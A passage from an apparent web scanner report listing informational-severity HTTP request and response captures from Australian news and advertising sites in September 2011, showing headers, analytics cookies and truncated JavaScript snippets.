20.22. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/09/02/tn_206341.jpg/%22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/09/02/tn_206341.jpg/%22

Request

GET /%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/09/02/tn_206341.jpg/%22 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php?category_id=4561,4521,4501,90,4551,4351&title=Photo%20Galleries
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.2.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:31:19 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n43 ( lax-agg-n7), ms lax-agg-n7 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

20.23. http://tools.ntnews.com.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.2.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:21:11 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n51 ( lax-agg-n45), ms lax-agg-n45 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

20.24. http://tools.ntnews.com.au/feeds/feed-breakingnews-datelist.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/feeds/feed-breakingnews-datelist.php

Request

GET /feeds/feed-breakingnews-datelist.php?feed_id=1&range=1to10 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:32 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n47.panthercdn.com
Cache-Control: max-age=269
Expires: Wed, 07 Sep 2011 14:19:24 GMT
Age: 97
Content-Length: 1839
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

jQuery(document).ready(function() {
   jQuery.getScript("http://tools.ntnews.com.au/scripts/jcarousellite_1.0.1.pack.js", function() {
       jQuery("#testticker").jCarouselLite({
           vertical: true,

...[SNIP]...

20.25. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/photo-gallery/photo_galleries_js.php

Request

GET /photo-gallery/photo_galleries_js.php?category_id=4561,4521,4501,90,4551,4351&title=Photo%20Galleries HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:24 GMT
Server: PWS/1.7.3.3
X-Px: rf-ms lax-agg-n47 ( lax-agg-n41), rf-ms lax-agg-n41 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:21:26 GMT
Age: 0
Content-Length: 2886
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write("<div class=\"photo-gallery photo-galleries\"> <div class=\"heading\"> <p><span id=\"photo_category_name\"><a href=\"http://tools.ntnews.com.au/photo-gallery/\">Photo Galleries</a
...[SNIP]...

20.26. http://tools.ntnews.com.au/search-results/adsense_frontpage_js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/search-results/adsense_frontpage_js.php

Request

GET /search-results/adsense_frontpage_js.php HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:54 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n21), rf-ms lax-agg-n21 ( origin>CONN)
Cache-Control: max-age=245
Expires: Wed, 07 Sep 2011 14:18:59 GMT
Age: 0
Content-Length: 3325
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

function google_ad_request_done(google_ads) {
/*
* This function is required and is used to display
* the ads that are returned from the JavaScript
* request. You should modify the document.write
...[SNIP]...

20.27. http://tools.ntnews.com.au/search-results/adsense_frontpage_js3.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/search-results/adsense_frontpage_js3.php

Request

GET /search-results/adsense_frontpage_js3.php HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.1.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:08 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n7), rf-ms lax-agg-n7 ( origin>CONN)
Cache-Control: max-age=282
Expires: Wed, 07 Sep 2011 14:21:50 GMT
Age: 0
Content-Length: 3345
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

function google_ad_request_done(google_ads) {
/*
* This function is required and is used to display
* the ads that are returned from the JavaScript
* request. You should modify the document.write
...[SNIP]...

20.28. http://tools.ntnews.com.au/weather/weather_panel.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/weather/weather_panel.php

Request

GET /weather/weather_panel.php HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:54 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n41), ht brf lax-agg-n41.panthercdn.com
Cache-Control: max-age=215
Expires: Wed, 07 Sep 2011 14:15:18 GMT
Age: 191
Content-Length: 1667
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write("<div id=\"right-col-weather-date\"><div id=\"right-col-date\"><p>Date: <strong>Sep 07, 2011  11:40pm ACST</strong> </p></div> <div class=\"search\"> <form action=\"h
...[SNIP]...

20.29. http://tools.ntnews.com.au/yoursay/article_page_comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/yoursay/article_page_comments.php

Request

GET /yoursay/article_page_comments.php?258681 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.1.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:00 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n47.panthercdn.com
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:22:10 GMT
Age: 111
Content-Length: 4296
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<h5 class="your-say-info">Latest Comments:</h5><div class="fill2 clearfloat"><blockquote><p>its way past time these death trap machines were banned from the road. If you cant afford a
...[SNIP]...

20.30. http://tools.ntnews.com.au/yoursay/article_single_comment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/yoursay/article_single_comment.php

Request

GET /yoursay/article_single_comment.php?258681 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.1.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:00 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n47.panthercdn.com
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:22:09 GMT
Age: 112
Content-Length: 358
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write("<h2 class=\"title-orange border-none\">Your Say</h2><div class=\"your-say-content\"><p>\"its way past time these death trap machines were banned from the road. If you cant afford a ca
...[SNIP]...

20.31. http://tools.themercury.com.au/feeds/feed-ticker.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-ticker.php

Request

GET /feeds/feed-ticker.php?category_id=1&range=0to6&rss_name=-breaking-news HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:11 GMT
Server: PWS/1.7.3.3
X-Px: rf-ms lax-agg-n30 ( lax-agg-n28), rf-ms lax-agg-n28 ( origin>CONN)
Cache-Control: max-age=241
Expires: Wed, 07 Sep 2011 14:21:13 GMT
Age: 0
Content-Length: 1010
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<ul id="TickerVertical"><li><a href="http://tools.themercury.com.au/stories/48249481-breaking-news.php"><span class="time">11:56 pm</span>Somali pirates release Danish family</a></li><
...[SNIP]...

20.32. http://tools.themercury.com.au/feeds/feed-with-lead.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-with-lead.php

Request

GET /feeds/feed-with-lead.php?category_id=2&range=0to5&rss_name=-national-news&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:59 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n59), rf-ms lax-agg-n59 ( origin>CONN)
Cache-Control: max-age=91
Expires: Wed, 07 Sep 2011 14:16:30 GMT
Age: 0
Content-Length: 1057
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div class="article-extracts-box"><div class="me2-extract-box"> <h4><a href="http://tools.themercury.com.au/stories/48249341-national-news.php" >Vulnerable to work off their fines in
...[SNIP]...

20.33. http://tools.themercury.com.au/misc/datetime.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/misc/datetime.php

Request

GET /misc/datetime.php HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:59 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n46), rf-ms lax-agg-n46 ( origin>CONN)
Cache-Control: max-age=21
Expires: Wed, 07 Sep 2011 14:15:20 GMT
Age: 0
Content-Length: 45
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write("September 8, 2011 12:14am");

20.34. http://tools.themercury.com.au/photo-gallery/featuredgallery.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/photo-gallery/featuredgallery.php

Request

GET /photo-gallery/featuredgallery.php HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:00 GMT
Server: PWS/1.7.3.3
X-Px: rf-ms lax-agg-n30 ( origin>CONN)
Cache-Control: max-age=32
Expires: Wed, 07 Sep 2011 14:15:33 GMT
Age: 0
Content-Length: 2232
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<p class="textheading" style="display:block;clear:both">Feature Gallery</p><div class="media-centre-box-left"> <div class="media-item feature-title"><div class
...[SNIP]...

20.35. http://tools.themercury.com.au/search-results/adsense_js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/search-results/adsense_js.php

Request

GET /search-results/adsense_js.php HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:00 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n42), ht-d lax-agg-n42.panthercdn.com
Cache-Control: max-age=6999
Expires: Wed, 07 Sep 2011 15:00:36 GMT
Age: 4263
Content-Length: 2970
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

function google_ad_request_done(google_ads) {
/*
* This function is required and is used to display
* the ads that are returned from the JavaScript
* request. You should modify the document.write
...[SNIP]...

20.36. http://tools.themercury.com.au/search-results/adsense_wide_js_skip3.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/search-results/adsense_wide_js_skip3.php

Request

GET /search-results/adsense_wide_js_skip3.php HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=uaUyCFBgOsN-XJ0QrwN

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:01 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n52), rf-ms lax-agg-n52 ( origin>CONN)
Cache-Control: max-age=6197
Expires: Wed, 07 Sep 2011 16:00:18 GMT
Age: 0
Content-Length: 3387
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

function google_ad_request_done(google_ads) {
/*
* This function is required and is used to display
* the ads that are returned from the JavaScript
* request. You should modify the document.write
...[SNIP]...

20.37. http://tools.themercury.com.au/video/featuredvideo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/video/featuredvideo.php

Request

GET /video/featuredvideo.php HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:00 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n46), rf-ms lax-agg-n46 ( origin>CONN)
Cache-Control: max-age=19
Expires: Wed, 07 Sep 2011 14:15:20 GMT
Age: 0
Content-Length: 1743
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<p class="textheading" style="display:block;clear:both">Feature Video</p><div class="media-centre-box-left"> <div class="media-item feature-title"><div class
...[SNIP]...

20.38. http://tools.themercury.com.au/weather/weather_inc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/weather/weather_inc.php

Request

GET /weather/weather_inc.php HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:59 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n48), rf-ms lax-agg-n48 ( origin>CONN)
Cache-Control: max-age=248
Expires: Wed, 07 Sep 2011 14:19:07 GMT
Age: 0
Content-Length: 322
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<p><a href="http://www.themercury.com.au/news/tasmanian-weather.html"><img src="http://media.news.com.au/fe/weathericons/late_shower.gif" alt="weather icon" border="0" /> Hobart 5C-14C
...[SNIP]...

20.39. http://tools.themercury.com.au/yoursay/article_page_comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/yoursay/article_page_comments.php

Request

GET /yoursay/article_page_comments.php?259671 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=uaUyCFBgOsN-XJ0QrwN

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:55 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n30.panthercdn.com
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:22:03 GMT
Age: 113
Content-Length: 6695
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div class="blue-top"><p><strong>Latest Comments:</strong></p></div>  <div class="feedback-comment"> <blockquote><p>What a reverse universe it has become
...[SNIP]...

20.40. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/yoursay/yoursay-single-extract.php

Request

GET /yoursay/yoursay-single-extract.php?range=0to1 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:35 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n30.panthercdn.com
Cache-Control: max-age=273
Expires: Wed, 07 Sep 2011 14:19:34 GMT
Age: 154
Content-Length: 432
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<h4><a href="http://www.themercury.com.au/article/2011/09/07/259501_food-wine.html">Micro brewer now a lot bigger</a></h4><p class="quoted-box">How ironic, their beer is \'not suitable
...[SNIP]...

20.41. http://uac.advertising.com/wrapper/aceUACping.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uac.advertising.com
Path:	/wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Wed, 07 Sep 2011 15:06:39 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:44 GMT
Content-Length: 2793
Connection: close

<html><head></head><body><script type='text/javascript'>
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

20.42. http://weather.news.com.au/wa/perth/perth previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/wa/perth/perth

Request

Response

20.43. http://weather.news.com.au/widgets/local/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/local/

Request

Response

20.44. http://weather.news.com.au/widgets/monthly-almanac/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/monthly-almanac/

Request

Response

20.45. http://weather.news.com.au/widgets/radar/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/radar/

Request

Response

20.46. http://weather.news.com.au/widgets/satellite/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/satellite/

Request

Response

20.47. http://www.abc.net.au/res/abc/submenus.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/abc/submenus.htm

Request

GET /res/abc/submenus.htm HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABCGuestID=http%3A//www.abc.net.au/perth/news/%3DPerth%20News%20-%20ABC%20Perth%20-%20Australian%20Broadcasting%20Corporation; __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315476868902:ss=1315476868902; SiteLifeHost=SJL02WSITEMABC1proddmlocal; anonId=f1e9cf78-d41c-4410-9c98-2b8c34e350af

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=57282
Expires: Thu, 08 Sep 2011 06:08:59 GMT
Date: Wed, 07 Sep 2011 14:14:17 GMT
Content-Length: 9146
Connection: close

<li id="abcNavHome"><a href="http://www.abc.net.au/" title="ABC Home"><img src="http://www.abc.net.au/res/abc/logos/nav_logo.png" alt="ABC Home" width="61" height="16"></a></li>
<li id="abcNa
...[SNIP]...

20.48. http://www.bcl.com.au/perth/news.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bcl.com.au
Path:	/perth/news.htm

Request

GET /perth/news.htm HTTP/1.1
Host: www.bcl.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 31 Aug 2011 08:12:36 GMT
Accept-Ranges: bytes
ETag: "207c5fbeb567cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
